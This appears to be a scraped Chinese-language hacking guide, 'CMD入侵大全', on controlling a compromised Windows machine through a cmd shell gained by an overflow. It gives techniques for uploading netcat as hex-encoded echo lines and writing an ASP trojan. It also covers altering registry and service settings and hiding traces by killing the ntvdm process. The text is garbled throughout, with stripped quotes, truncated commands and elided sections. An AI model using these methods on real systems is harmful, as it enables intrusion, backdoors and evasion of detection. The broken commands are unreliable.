
CMD入侵大全.docx
5页本文格式为Word版,下载可任意编辑CMD入侵大全 前言 Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰 本文旨在介绍和总结一些在命令行下操纵Windows系统的方法这些方法都是尽可能地利用系统自带的工具实现的 文件传输 对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件由于蠕虫病毒流行,连接ipc$所需要的139或445端口被路由封锁再加上WinXP系统加强了对ipc$的养护,通过ipc$及默认共享上传文件的手段根本无效了ftp和tftp是两种可行的方法,介于其已被大家熟知,本文就不介绍了还有三种大家熟谙的手段,作为总结我再提一下: 1,用Echo命令写ASP木马 前提当然是目标主机上已经安装了IIS 一般的ASP木马\体积\较大,不适合直接用echo命令写入文件,这里我供给一个小巧的 直接给出echo版: @echo ^>debug.vbs\.writeline \+\ +\\end with 将其保存为echo.vbs假设要上传nc.exe,那么在本地命令行输入命令: cscript echo.vbs nc.exe 也可以直接把要传输的文件的图标拖放到脚本文件的图标上。
稍等一会儿,在当前目次下将生成一个nc.exe.bat用记事本等编辑工具开启它,可以看到如下内容: @echo str=\0000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000\@echo +\000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000\@echo +\000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000\@echo +\0001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000202200\............ ............(省略若干行) ............ @echo +\ @echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write \r:next>>debug.vbs @echo .write \with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp \ 全选 -》 复制 -》 切换到远程命令行窗口 -》 粘贴。
假设网速不是很慢的话,整个上传过程大约需要20秒 几点说明: 1,大的文件传输不稳定,可能会使shell死掉所以文件越小效果越好建议原文件不要超过100KB 2,在传输大文件前,可以先传个小的文件作为\热身\,让16位虚拟机ntvdm.exe驻留后台全体文件传完后,为隐秘起见,理应把ntvdm进程杀掉 3,某些cmd shell每个命令都需要附加两个回车,那nc.exe.bat就不能直接用了 4,单个命令的长度是有限的,所以不能只用一个echo完成全部任务而且,对于nc供给的cmd shell,稍长一些的命令竟然会使shell自动退出(溢出了?)你可以修改\128=0\语句中的128以调整每个echo命令的长度每次echo的字符为这个数乘以2 5,解码过程没有脚本参与也是可以的使用脚本的目的是裁减传输的数据量(由于压缩了数据)假设有时间,我会写一个更完善的脚本,加强数据压缩才能,增加数据校验功能 能上传文件当然一切都好办了,但好多操作用Windows自带的工具更便当在你四处探索需要的工具时,不要忘了Windows本身 系统配置 这节包括三方面内容:注册表、服务和组策略。
先说注册表好多命令行下访问注册表的工具都是交互式的,溢出产生的shell一般不能再次重定向输入/输出流,所以无法使用 好在系统自带的regedit.exe足够用了 1,读取注册表 先将想查询的注册表项导出,再用type查看,譬如: C:\\>regedit /e 1.reg \Server\\WinStations\\RDP-Tcp\C:\\>type 1.reg | find \\C:\\>del 1.reg 所以终端服务的端口是3389(十六进制d3d) 2,修改/删除注册表项 先echo一个reg文件,然后导入,譬如: echo Windows Registry Editor Version 5.00 >1.reg echo. >>1.reg echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0] >>1.reg echo \echo \echo. >>1.reg regedit /s 1.reg 将telnet服务端口改为2323(十六进制913),NTLM认证方式为1。
要删除一个项,在名字前面加减号,譬如: [-HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Serv-U] 要删除一个值,在等号后面用减号,譬如: [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run] \ — 5 —。












